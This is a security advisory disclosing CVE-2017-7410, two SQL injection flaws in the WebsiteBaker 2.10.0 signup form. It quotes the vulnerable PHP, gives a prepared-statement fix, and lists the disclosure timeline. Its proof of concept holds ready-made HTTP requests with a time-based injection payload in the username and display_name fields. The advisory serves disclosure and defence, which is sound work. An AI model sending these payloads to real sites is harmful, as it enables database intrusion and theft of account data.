
WebsiteBaker CMS 2.10.0 – Multiple SQL Injection Vulnerabilities

Overview

WebsiteBaker 2.10.0 and earlier versions are affected by multiple SQL injection vulnerabilities.

Background

WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS).

Details

An unauthenticated user can inject SQL code through the “username” and “display_name” parameters of the “account/signup.php” script (the signup form). The vulnerability exists because user-supplied data is not sufficiently sanitized before it is used in SQL queries. By exploiting it, an attacker gains access to all records stored in the database with the privileges of the WebsiteBaker database user (e.g. the administrator's password MD5 hash).



Vulnerable code:
account/signup2.php

40 $username = strtolower(strip_tags($wb->get_post('username'))); <-- user input
41 $display_name = strip_tags($wb->get_post('display_name')); <-- user input
...
50 // Check if username already exists
51 $sql = 'SELECT `user_id` FROM `'.TABLE_PREFIX.'users` WHERE `username` = \''.$username.'\''; <-- SQL injection no. 1
52 if ($database->get_one($sql)) {
53     $error[] = $MESSAGE['USERS_USERNAME_TAKEN']."\n";
54 }
55 if(!preg_match('/^[a-z]{1}[a-z0-9_-]{2,}$/i', $username)) {
56    $error[] =  $MESSAGE['USERS_NAME_INVALID_CHARS']."\n";
57 }
58 $sql  = 'SELECT COUNT(*) FROM `'.TABLE_PREFIX.'users` ';
59 $sql .= 'WHERE  `display_name` LIKE \''.$display_name.'\''; <-- SQL injection no. 2
60 if ($database->get_one($sql) > 0) {
61     $error[] = $MESSAGE['USERS_DISPLAYNAME_TAKEN'].'';

The POST parameters “username” (line 40) and “display_name” (line 41) are concatenated unsanitized into the SQL strings built on lines 51 and 59, which are then executed by the function “get_one” (lines 52 and 60). Neither prepared statements nor escaping are used, and the character whitelist check on line 55 only runs after the first query has already been executed.

framework/class.database.php

102    // Gets the first column of the first row
103    function get_one( $statement )
104    {
105        $fetch_row = mysqli_fetch_array(mysqli_query($this->db_handle, $statement) );
106        $result = $fetch_row[0];
107        $this->set_error(null);
108        if(mysqli_error($this->db_handle)) {
109            $this->set_error(mysqli_error($this->db_handle));
110            return null;
111        } else {
112            return $result;
113        }
114    }
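As an added example (not WebsiteBaker's own code and not the vendor's 2.10.1 fix), the two checks from account/signup2.php can be written with mysqli prepared statements, so that the username and display_name values are bound as data instead of being concatenated into the string that get_one() executes. It assumes $db_handle is the open mysqli connection that the framework's database class wraps, and that TABLE_PREFIX, $wb and $MESSAGE exist as in the original; the helper function names are my own.

```php
<?php
// Added example, not part of WebsiteBaker. Hardened versions of the two
// signup checks: user input never reaches the SQL parser as code.
// Assumptions: $db_handle is an open mysqli connection, TABLE_PREFIX is the
// framework's table prefix constant, $wb and $MESSAGE exist as in the original.

function username_is_valid(string $username): bool
{
    // Same whitelist the original applies on line 55, but enforced BEFORE
    // any query runs, so malformed input never touches the database.
    return preg_match('/^[a-z]{1}[a-z0-9_-]{2,}$/i', $username) === 1;
}

function username_exists(mysqli $db_handle, string $username): bool
{
    // The "?" placeholder replaces the quoted, concatenated value of line 51.
    $sql  = 'SELECT `user_id` FROM `' . TABLE_PREFIX . 'users` WHERE `username` = ?';
    $stmt = mysqli_prepare($db_handle, $sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . mysqli_error($db_handle));
    }
    // The value travels separately from the statement text, so a quote or
    // "-- " inside it is plain data and cannot alter the query.
    mysqli_stmt_bind_param($stmt, 's', $username);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_store_result($stmt);
    $found = mysqli_stmt_num_rows($stmt) > 0;
    mysqli_stmt_close($stmt);
    return $found;
}

function display_name_taken(mysqli $db_handle, string $display_name): bool
{
    // Line 59 used LIKE on the raw value, so "%" or "_" in a display name also
    // acted as wildcards. An exact comparison is what a "taken" check needs;
    // if LIKE is really wanted, escape the value first with
    // addcslashes($display_name, '%_') and still bind it as a parameter.
    $sql  = 'SELECT COUNT(*) FROM `' . TABLE_PREFIX . 'users` WHERE `display_name` = ?';
    $stmt = mysqli_prepare($db_handle, $sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . mysqli_error($db_handle));
    }
    mysqli_stmt_bind_param($stmt, 's', $display_name);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $count);
    mysqli_stmt_fetch($stmt);
    mysqli_stmt_close($stmt);
    return (int) $count > 0;
}

// Replacement for lines 50-61 of the original signup flow: validate the
// username first, and only query for inputs that passed validation.
$username     = strtolower(strip_tags($wb->get_post('username')));
$display_name = strip_tags($wb->get_post('display_name'));
$error        = [];

if (!username_is_valid($username)) {
    $error[] = $MESSAGE['USERS_NAME_INVALID_CHARS'] . "\n";
} elseif (username_exists($db_handle, $username)) {
    $error[] = $MESSAGE['USERS_USERNAME_TAKEN'] . "\n";
}
if (display_name_taken($db_handle, $display_name)) {
    $error[] = $MESSAGE['USERS_DISPLAYNAME_TAKEN'];
}
```

The important difference from the original is structural rather than a matter of escaping: the statement text is fixed at prepare time and the values are sent afterwards, so the database never interprets them as SQL. Reordering the checks so the regex runs first is a second, independent layer; it would not by itself have prevented the display_name injection, which has no whitelist at all.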

Proof of concept

SQL Injection no.1: parameter username

Payload: sql' OR SLEEP(5)-- 

POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134734&email-address=&name=&full_name=&username=sql' OR SLEEP(5)-- &display_name=test&email=test&captcha=&submit=Sign-up

The response is delayed by 5 seconds.

SQL Injection no.2: parameter display_name

Payload: sql' OR SLEEP(5)-- 

POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134833&email-address=&name=&full_name=&username=test&display_name=sql' OR SLEEP(5)-- &email=test&captcha=&submit=Sign-up

The response is delayed by 5 seconds.

Solution

Update to WebsiteBaker 2.10.1 or a newer version.

Report timeline

24.03.2017 Informed vendor about vulnerabilities
25.03.2017 Vendor confirms and releases fixes
03.04.2017 CVE assigned
07.04.2017 Disclosed to public

Credit

These vulnerabilities were discovered by Marek Alaksa from Citadelo.


References

  1. www.citadelo.com/en/websitebaker-cms-2-10-0-multiple-sql-injection-vulnerabilities
  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7410
  3. http://websitebaker.org
  4. http://project.websitebaker.org/issues/39
  5. http://forum.websitebaker.org/index.php/topic,30187.0.html

About the author

Citadelo
Citadelo is a firm of ethical hackers on your side. We think like hackers, but we don't abuse it. On the contrary, our main goal is to reveal vulnerabilities without causing damage. We have been conducting simulated attacks for our clients since 2006.